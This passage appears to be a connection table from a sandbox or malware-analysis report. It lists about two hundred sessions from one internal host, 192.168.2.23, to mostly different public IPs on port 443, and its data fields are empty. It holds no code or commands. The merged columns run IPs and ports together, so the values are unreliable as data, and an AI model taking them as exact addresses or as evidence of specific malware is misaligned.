                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11715192.168.2.2348384110.242.93.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11716192.168.2.2340712203.143.123.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11717192.168.2.2338618183.71.104.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11718192.168.2.2348566114.166.253.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11719192.168.2.2347678144.55.162.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11720192.168.2.234887823.216.65.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11721192.168.2.235907660.75.72.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11722192.168.2.23485622.121.125.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11723192.168.2.236002665.206.47.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11724192.168.2.2350724187.66.105.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11725192.168.2.234014813.14.52.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11726192.168.2.23532842.188.91.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11727192.168.2.2338110221.165.176.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11728192.168.2.233579073.111.165.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11729192.168.2.2339576130.27.197.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11730192.168.2.2333864199.74.79.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11731192.168.2.2338210119.7.28.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11732192.168.2.235831441.121.213.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11733192.168.2.2337228195.201.201.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11734192.168.2.2355770102.105.120.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11735192.168.2.235115498.86.90.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11736192.168.2.235851886.131.148.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11737192.168.2.2356888208.129.221.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11738192.168.2.235734218.135.179.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11739192.168.2.235718234.182.201.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11740192.168.2.2354868189.217.193.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11741192.168.2.2333582116.244.182.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11742192.168.2.2352038154.15.216.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11743192.168.2.2350560199.148.123.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11744192.168.2.2353102178.36.237.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11745192.168.2.2352708111.69.28.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11746192.168.2.233303612.199.241.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11747192.168.2.2353242195.70.227.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11748192.168.2.233610639.57.209.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11749192.168.2.2338638191.165.128.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11750192.168.2.2360850164.195.30.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11751192.168.2.2335216137.0.16.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11752192.168.2.2352896109.159.253.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11753192.168.2.234490859.65.70.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11754192.168.2.234091017.156.112.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11755192.168.2.2334548204.74.151.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11756192.168.2.234356049.51.234.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11757192.168.2.233754488.210.119.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11758192.168.2.233907488.185.107.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11759192.168.2.235901237.1.163.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11760192.168.2.234641478.17.135.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11761192.168.2.234364883.175.15.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11762192.168.2.233958298.195.63.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11763192.168.2.2343268182.168.158.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11764192.168.2.2355752130.198.3.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11765192.168.2.2346398206.238.198.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11766192.168.2.235821013.138.240.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11767192.168.2.234495040.95.45.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11768192.168.2.2336532138.47.180.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11769192.168.2.2351728194.10.181.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11770192.168.2.2339272159.58.227.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11771192.168.2.2358728117.138.206.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11772192.168.2.2333126148.240.242.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11773192.168.2.2351112181.253.205.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11774192.168.2.233665027.48.169.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11775192.168.2.234979632.104.90.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11776192.168.2.2333058121.84.155.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11777192.168.2.234963638.117.146.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11778192.168.2.233517227.175.139.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11779192.168.2.2338922177.240.61.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11780192.168.2.2347644162.183.91.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11781192.168.2.233849052.52.54.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11782192.168.2.2353398139.92.187.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11783192.168.2.2358262131.7.216.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11784192.168.2.235571235.41.160.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11785192.168.2.233510486.27.62.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11786192.168.2.2351660217.139.178.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11787192.168.2.2337820109.129.38.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11788192.168.2.233473877.11.234.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11789192.168.2.236062486.129.255.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11790192.168.2.2343600156.141.135.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11791192.168.2.2335954104.95.46.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11792192.168.2.2354512186.176.233.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11793192.168.2.2336326141.139.174.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11794192.168.2.235333048.134.198.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11795192.168.2.23357388.119.209.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11796192.168.2.2351300120.164.126.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11797192.168.2.2347116166.81.228.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11798192.168.2.2360566187.85.59.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11799192.168.2.234666424.53.128.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11800192.168.2.2354200117.203.149.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11801192.168.2.2344746158.194.204.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11802192.168.2.233420482.104.67.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11803192.168.2.235229265.70.84.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11804192.168.2.2354958175.211.127.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11805192.168.2.2357820101.30.248.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11806192.168.2.235979418.176.204.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11807192.168.2.2340482133.19.75.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11808192.168.2.235944241.7.254.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11809192.168.2.2353198107.125.105.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11810192.168.2.2335218195.156.117.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11811192.168.2.235160478.45.206.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11812192.168.2.233399246.112.143.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11813192.168.2.2357706107.9.129.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11814192.168.2.2358502176.29.80.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11815192.168.2.2359686102.53.117.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11816192.168.2.2355910213.206.78.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11817192.168.2.234398045.61.13.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11818192.168.2.2346242146.165.249.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11819192.168.2.2352156140.152.81.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11820192.168.2.235080258.27.8.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11821192.168.2.235295069.13.62.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11822192.168.2.234628620.30.4.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11823192.168.2.233663248.216.216.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11824192.168.2.235139675.212.140.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11825192.168.2.235862673.167.243.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11826192.168.2.234055488.15.43.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11827192.168.2.234749077.10.40.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11828192.168.2.2333040140.22.42.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11829192.168.2.2338568122.184.62.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11830192.168.2.2337280133.76.187.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11831192.168.2.2341336196.89.23.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11832192.168.2.2334924187.58.31.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11833192.168.2.2344626160.221.231.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11834192.168.2.2360068183.117.207.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11835192.168.2.2344576120.101.207.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11836192.168.2.2336294155.31.155.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11837192.168.2.23346768.64.13.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11838192.168.2.2348896111.164.99.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11839192.168.2.2339674160.192.226.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11840192.168.2.2338026177.39.110.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11841192.168.2.2333924185.19.16.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11842192.168.2.2357578118.173.116.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11843192.168.2.233931253.118.1.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11844192.168.2.235156280.99.182.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11845192.168.2.2347800159.237.98.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11846192.168.2.235154289.237.46.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11847192.168.2.2334010154.204.35.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11848192.168.2.233920449.233.17.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11849192.168.2.2346832198.204.13.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11850192.168.2.2349242106.198.196.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11851192.168.2.2360296115.118.53.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11852192.168.2.236041461.248.239.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11853192.168.2.234360079.204.154.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11854192.168.2.2350650152.41.230.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11855192.168.2.233339254.74.251.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11856192.168.2.233367631.173.182.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11857192.168.2.2334270113.7.128.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11858192.168.2.2356052116.88.98.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11859192.168.2.2334052167.152.166.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11860192.168.2.2342252183.175.82.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11861192.168.2.2346886155.131.104.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11862192.168.2.2358610178.29.235.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11863192.168.2.2340132174.39.76.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11864192.168.2.2356688114.177.52.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11865192.168.2.233859842.186.107.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11866192.168.2.2332956174.142.71.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11867192.168.2.2356286201.142.97.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11868192.168.2.2350288116.27.37.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11869192.168.2.2334812211.233.40.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11870192.168.2.233770881.48.213.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11871192.168.2.2344028164.107.85.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11872192.168.2.2340416170.175.43.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11873192.168.2.23595688.64.195.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11874192.168.2.233440261.91.115.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11875192.168.2.2344340200.250.175.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11876192.168.2.233340267.169.155.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11877192.168.2.2359728181.12.189.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11878192.168.2.2352156193.200.94.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11879192.168.2.2350140117.152.91.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11880192.168.2.233290258.132.221.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11881192.168.2.2345774186.105.103.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11882192.168.2.2339026118.67.143.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11883192.168.2.2341102133.45.67.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11884192.168.2.2353722121.52.135.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11885192.168.2.234929448.71.29.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11886192.168.2.2346838191.227.129.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11887192.168.2.235666657.38.70.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11888192.168.2.235741478.63.174.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11889192.168.2.2344542211.217.204.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11890192.168.2.235686487.178.72.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11891192.168.2.2360874154.80.140.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11892192.168.2.2336544220.127.54.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11893192.168.2.233713037.210.253.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11894192.168.2.234261691.98.80.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11895192.168.2.234669639.34.162.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11896192.168.2.2335652196.120.28.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11897192.168.2.235585881.119.128.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11898192.168.2.235189817.176.183.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11899192.168.2.23343182.98.32.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11900192.168.2.234539294.212.162.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11901192.168.2.2351322142.154.143.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11902192.168.2.2336628122.101.213.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11903192.168.2.2348658201.104.11.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11904192.168.2.236069412.218.102.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11905192.168.2.2354728184.96.108.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11906192.168.2.2343300125.201.147.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11907192.168.2.234387680.50.251.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11908192.168.2.2350198197.156.217.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11909192.168.2.2358944194.32.161.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11910192.168.2.2347640223.31.159.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11911192.168.2.2343780202.92.231.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11912192.168.2.2359992110.33.46.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11913192.168.2.2354310192.31.85.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11914192.168.2.2334986106.230.86.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11915192.168.2.2345192167.224.102.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11916192.168.2.2350584149.155.239.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11917192.168.2.2351910101.242.16.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11918192.168.2.2337008219.223.32.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11919192.168.2.235841859.246.177.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11920192.168.2.235011480.212.40.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11921192.168.2.2359522199.47.136.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11922192.168.2.2332994132.113.83.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11923192.168.2.2356928134.26.30.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11924192.168.2.2355296167.252.98.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11925192.168.2.235604642.227.88.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11926192.168.2.235364014.101.252.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11927192.168.2.2353338164.253.114.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11928192.168.2.2346514123.252.4.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11929192.168.2.2334864123.226.39.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11930192.168.2.233955888.161.25.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11931192.168.2.2335952130.41.117.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11932192.168.2.234548641.102.208.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11933192.168.2.2343054112.132.53.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11934192.168.2.235260424.157.189.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11935192.168.2.2339432219.165.97.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
